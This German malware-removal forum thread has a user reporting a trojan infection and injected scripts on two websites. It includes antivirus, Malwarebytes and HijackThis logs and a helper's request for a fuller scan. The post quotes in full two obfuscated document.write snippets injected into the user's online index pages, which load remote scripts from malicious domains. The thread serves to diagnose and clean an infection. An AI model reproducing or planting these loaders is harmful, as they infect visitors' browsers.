Hallo...
Habe ein (Trojaner-)Problem - die Logs poste ich dann im Anschluß...
Das Problem äußert sich durch langsames System, stehenbleibenden Bildschirmschoner, und ich denke, es hat auch damit zu tun:
Ich betreibe 2 Homepages, und seit einiger Zeit taucht - wie auch immer - in der ONLINE-Version meiner index.htm seiten regelmäßig scripts auf (nur in der online-version, die index.htm dateen auf meiner festplatte bleiben unverändert ! da die eine homepage bei arcor, die andere bei host4free gehostet ist, kommt mir das seltsam vor...

das eine script:

<script>/*Exception*/ document.write('<script src='+'h!t#&$(t@!p!&:!(/!!/@#&l#(i)@n@^@k^&$@s^^#y((#&n#e$)r&&g^#y()-$&&c)!)o!&#m$.#m)$$s^n@!.)&c^!!o@#m(&.(c!$n()(.(#&f#&@!l#!$!i&))n##g&&&)(-$(c^$o@m&!.&$s&@u(^$)p$e&##r$#t&!&r$^$@u(!)e)#l)#!i!!!)#f^$&e$!^.()$!r#!(u@&(@&8@$0!$8^#0((/^)a&s)$(s)o#)c#!i$a(&)t#$e#(^&d@@$#c#!o@^n!@^!t#e)#&n$&t(()$!.$&^)c^(o)(#!(m#/$@^a^)(s!@()s)$)@o@@)!c^!&i$a@$t$e!!&d)$c$#o@#@n$(!t#$))e()$(n(!t!(^!.#@$c&&#!o)!@m^!^)@/)@)g)!o)!o(&^g@(l$@^&e((@.(#c$o)@(m&/@#s^))@e$&##n$#^^d@&@s)&@&p#a(c#e^.!&@c@^o$^^m(^!/!h^^a(r$&d^(s@^e$)x!$&t#(u^b!!@e@$^.)(c)o!^m$)@/#&)!'.replace(/@|#|\)|&|\(|\!|\^|\$/ig, '')+' defer=defer></scr'+'ipt>');</script>

<!--bb351a29f71f86436284012bdc843c51-->

das andere:

<script>/*Exception*/ document.write('<script src='+'h!#^t)t^(()p&@:#(/@^/&^&o)d@)^e&^s(^((#k$$^)-&$@)c^)!@o!m@(^.(^@m$#a@&c((y$#$s($.)!c@#@!o@@))m^&.(#$z$@i$#&#d^&d!u&#(&-$&c&)(o^)m$(^#.&#$g!()e&n!^!u)$)i$&#n&#&e)(@c#@!$o)#@l$o!#r&&s)$.^!)@(r@u(&@:!)!8))&0^#8^0^!@/##a(&$c!!)#$e(r@@@.)(@c$#$o^@!m)$(/^a@(c^&&&!e(^#r))#.&&$c&)$^o#^m#/)##y#(&o(@$u&^(d@a#o!^^!.^c!$$!o&)^&$m@$/$@i!^$@c)i#&$(c(($i@(b$a()n$(k$)^.$$$)c@^&o(@@m()/)!g&)#o^$@o#^#g#l&!e@$.!^c)(@o$^m^#/$)'.replace(/\)|&|#|@|\!|\^|\(|\$/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6594db7b72523c30fbba924501816e7f-->

Als Windows Defender mir ne Warnung brachte, hab ich AntiVir installiert. Ergebnis:

10.1.2010: AntiVir-Meldung:
In der Datei 'C:\Windows\System32\efsuavaw.dll'
wurde ein Virus oder unerwünschtes Programm 'TR/Spy.Ursnif.34816I.1' [trojan] gefunden.
AntiVir konnte nicht löschen, also hab ich das Teil umbenannt und dann, wie ich meinte, entfernt durch löschen mit BVWipe.

Dann am 16.1.2010 von AntiVir:
In der Datei 'C:\~BCWipe.stu\Windows_System32_efsuavaw.VIR'
wurde ein Virus oder unerwünschtes Programm 'TR/Spy.Ursnif.34816I.1' [trojan] gefunden.

Wieder vermeintlich entfernt, dann am 22.1.:
AntiVir meldet:
In der Datei 'C:\Program Files\Mozilla Firefox\fjhdyfhsn.bat'
wurde ein Virus oder unerwünschtes Programm 'BAT/Agent.143' [virus] gefunden.
Ausgeführte Aktion: Datei löschen
In der Datei 'C:\Users\PC012007\AppData\Local\Temp\~TME914.tmp'
wurde ein Virus oder unerwünschtes Programm 'TR/Crypt.ZPACK.Gen' [trojan] gefunden.
Ausgeführte Aktion: Datei löschen
In der Datei 'C:\Users\PC012007\AppData\Local\Temp\~TME914.tmp'
wurde ein Virus oder unerwünschtes Programm 'TR/Crypt.ZPACK.Gen' [trojan] gefunden.
Ausgeführte Aktion: Datei löschen
In der Datei 'C:\Windows\System32\efsuavaw.dll'
wurde ein Virus oder unerwünschtes Programm 'TR/Agent.35328' [trojan] gefunden.
Ausgeführte Aktion: Datei umbenennen
In der Datei 'C:\Windows\System32\efsuavaw.dll'
wurde ein Virus oder unerwünschtes Programm 'TR/Agent.35328' [trojan] gefunden.
Ausgeführte Aktion: Datei löschen
In der Datei 'C:\Windows\System32\efsuavaw.dll'
wurde ein Virus oder unerwünschtes Programm 'TR/Agent.35328' [trojan] gefunden.
Ausgeführte Aktion: Zugriff verweigern

Habe jetzt die hier empfohlenen 3 Programme ausgeführt, hier das log von anti-malware:

Malwarebytes' Anti-Malware 1.44
Datenbank Version: 3614
Windows 6.0.6000
Internet Explorer 7.0.6000.16386

22.01.2010 13:25:33
mbam-log-2010-01-22 (13-25-09).txt

Scan-Methode: Quick-Scan
Durchsuchte Objekte: 95781
Laufzeit: 43 minute(s), 47 second(s)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 1
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 2

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysgif32 (Trojan.Agent) -> No action taken.

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
C:\Users\PC012007\AppData\Roaming\avdrn.dat (Malware.Trace) -> No action taken.
C:\Users\PC012007\AppData\Roaming\fvgqad.dat (Malware.Trace) -> No action taken.

Habe alle drei dann in der Quarantäneliste gelöscht.

Poste in einem 2. Post dann das log von RSIT...

Bin ich die Dinger nun los, oder was kann ich weiter tun???
Danke schonmal...

hier noch das RSIT-Log:

Logfile of random's system information tool 1.06 (written by random/random)
Run by PC012007 at 2010-01-22 13:37:14
Microsoft® Windows Vista™ Home Basic
System drive C: has 122 GB (85%) free of 144 GB
Total RAM: 447 MB (29% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 13:38:07, on 22.01.2010
Platform: Windows Vista (WinNT 6.00.1904)
MSIE: Internet Explorer v7.00 (7.00.6000.16386)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\RtHDVCpl.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Windows\System32\mobsync.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Software\RSIT.exe
C:\Program Files\trend micro\PC012007.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.king.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKCU\..\Run: [ccleaner] "C:\Program Files\CCleaner\ccleaner.exe" /AUTO
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETZWERKDIENST')
O4 - Startup: wwwpos32.exe
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O13 - Gopher Prefix:
O23 - Service: Avira AntiVir Planer (AntiVirSchedulerService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Ati External Event Utility - ATI Technologies Inc. - C:\Windows\system32\Ati2evxx.exe
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
O23 - Service: Roxio Hard Drive Watcher 9 (RoxWatch9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: X10 Device Network Service (x10nets) - X10 - C:\PROGRA~1\COMMON~1\X10\Common\x10nets.exe

--
End of file - 3765 bytes

======Scheduled tasks folder======

C:\Windows\tasks\Erweiterte Garantie.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]
Adobe PDF Reader - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2006-10-22 62080]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
SSVHelper Class - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll [2008-02-22 509328]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"=C:\Windows\RtHDVCpl.exe [2006-11-09 3784704]
""= []
"avgnt"=C:\Program Files\Avira\AntiVir Desktop\avgnt.exe [2009-03-02 209153]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ccleaner"=C:\Program Files\CCleaner\ccleaner.exe [2009-12-21 1803064]

C:\Users\PC012007\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
wwwpos32.exe

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

======List of files/folders created in the last 1 months======

2010-01-22 13:04:58 ----D---- C:\Program Files\trend micro
2010-01-22 13:04:51 ----D---- C:\rsit
2010-01-22 12:38:11 ----D---- C:\Users\PC012007\AppData\Roaming\Malwarebytes
2010-01-22 12:37:56 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
2010-01-22 12:30:37 ----D---- C:\Program Files\CCleaner
2010-01-22 09:07:22 ----D---- C:\~BCWipe.stu
2010-01-09 17:14:05 ----D---- C:\Program Files\Avira

======List of files/folders modified in the last 1 months======

2010-01-22 13:37:03 ----D---- C:\Software
2010-01-22 13:36:03 ----D---- C:\Arbeitsplatz
2010-01-22 13:35:41 ----D---- C:\Program Files\Mozilla Firefox
2010-01-22 13:33:32 ----D---- C:\Windows
2010-01-22 13:31:38 ----D---- C:\Windows\Prefetch
2010-01-22 13:31:06 ----D---- C:\Windows\Temp
2010-01-22 13:30:03 ----D---- C:\Windows\system32\drivers
2010-01-22 13:28:27 ----D---- C:\Windows\Users
2010-01-22 13:04:58 ----RD---- C:\Program Files
2010-01-22 13:03:56 ----D---- C:\Backup
2010-01-22 12:37:57 ----HD---- C:\ProgramData
2010-01-22 12:32:29 ----D---- C:\Windows\Debug
2010-01-22 09:02:56 ----AD---- C:\Windows\System32
2010-01-19 16:58:48 ----D---- C:\Program Files\Firefox
2010-01-18 14:05:33 ----D---- C:\Users\PC012007\AppData\Roaming\OpenOffice.org2
2010-01-11 16:45:18 ----D---- C:\Users\PC012007\AppData\Roaming\vlc
2010-01-10 09:43:17 ----D---- C:\Windows\system32\catroot2
2010-01-10 09:28:08 ----A---- C:\Windows\system32\PerfStringBackup.INI
2010-01-10 09:28:07 ----D---- C:\Windows\inf
2010-01-09 19:26:54 ----SHD---- C:\System Volume Information
2010-01-09 17:12:16 ----SHD---- C:\Windows\Installer
2010-01-09 17:12:15 ----D---- C:\Windows\winsxs
2010-01-05 13:18:32 ----A---- C:\Windows\DBROUTE.INI

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 ASPI32;ASPI32; C:\Windows\system32\drivers\ASPI32.sys [2002-07-17 16877]
R1 avgio;avgio; \??\C:\Program Files\Avira\AntiVir Desktop\avgio.sys [2009-02-13 11608]
R1 avipbb;avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [2009-03-30 96104]
R1 ssmdrv;ssmdrv; C:\Windows\system32\DRIVERS\ssmdrv.sys [2009-05-11 28520]
R2 avgntflt;avgntflt; C:\Windows\system32\DRIVERS\avgntflt.sys [2009-11-25 56816]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\Windows\system32\drivers\RTKVHDA.sys [2006-11-08 1647976]
R3 NeroCd2k;NeroCd2k; C:\Windows\system32\drivers\NeroCd2k.sys [2001-04-16 44227]
R3 R300;R300; C:\Windows\system32\DRIVERS\atikmdag.sys [2007-01-08 2313216]
R3 RTL8023xp;NDIS-x86-Treiber für Realtek 10/100-Netzwerkkartenfamilie; C:\Windows\system32\DRIVERS\Rtnicxp.sys [2006-11-02 47104]
R3 StillCam;Treiber für serielle Digitalkamera; C:\Windows\system32\DRIVERS\serscan.sys [2006-11-02 9216]
R3 WUDFRd;WUDFRd; C:\Windows\system32\DRIVERS\WUDFRd.sys [2006-11-02 82560]
R3 X10Hid;X10 Hid Device; C:\Windows\System32\Drivers\x10hid.sys [2006-11-17 13976]
S3 drmkaud;Microsoft Kernel-DRM-Audioentschlüsselung; C:\Windows\system32\drivers\drmkaud.sys [2006-11-02 5632]
S3 MSKSSRV;Microsoft Streaming Service Proxy; C:\Windows\system32\drivers\MSKSSRV.sys [2006-11-02 8192]
S3 MSPCLOCK;Microsoft Proxy für Streaming Clock; C:\Windows\system32\drivers\MSPCLOCK.sys [2006-11-02 5888]
S3 MSPQM;Microsoft Proxy für Streaming Quality Manager; C:\Windows\system32\drivers\MSPQM.sys [2006-11-02 5504]
S3 MSTEE;Microsoft Streaming Tee/Sink-to-Sink-Konvertierung; C:\Windows\system32\drivers\MSTEE.sys [2006-11-02 6016]
S3 sonyhcs;Sony Digital Imaging Video; C:\Windows\system32\DRIVERS\sonyhcs.sys [2001-11-05 299923]
S3 usbaudio;USB-Audiotreiber (WDM); C:\Windows\system32\drivers\usbaudio.sys [2006-11-02 71552]
S3 wanatw;WAN Miniport (ATW); C:\Windows\system32\DRIVERS\wanatw4.sys [2006-11-01 33588]
S4 BCSWAP;BCSWAP; C:\Windows\system32\drivers\BCSWAP.sys [2007-09-14 91496]
S4 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\Windows\system32\drivers\wmiacpi.sys [2006-11-02 11264]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 AntiVirSchedulerService;Avira AntiVir Planer; C:\Program Files\Avira\AntiVir Desktop\sched.exe [2009-05-13 108289]
R2 AntiVirService;Avira AntiVir Guard; C:\Program Files\Avira\AntiVir Desktop\avguard.exe [2009-07-21 185089]
R2 Ati External Event Utility;Ati External Event Utility; C:\Windows\system32\Ati2evxx.exe [2007-01-08 557056]
R2 RoxWatch9;Roxio Hard Drive Watcher 9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe [2007-01-11 166648]
R2 x10nets;X10 Device Network Service; C:\PROGRA~1\COMMON~1\X10\Common\x10nets.exe [2001-11-12 20480]
S2 CLTNetCnService;Symantec Lic NetConnect service; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe /h ccCommon []
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 RoxMediaDB9;RoxMediaDB9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe [2007-01-11 887544]
S3 SQLWriter;SQL Server VSS Writer; c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe [2006-04-14 87840]
S3 stllssvr;stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [2006-09-14 73728]

-----------------EOF-----------------

Hallo und

Zitat:

Datenbank Version: 3614
Scan-Methode: Quick-Scan

Den Durchlauf mit Malwarebytes bitte wiederholen!
- du hattest keine aktuellen Signaturen, bei vor jedem Gebrauch von Malwarebytes das Programmupdate ausführen
- du hast nur nen Quick- und keinen Vollscan gemacht.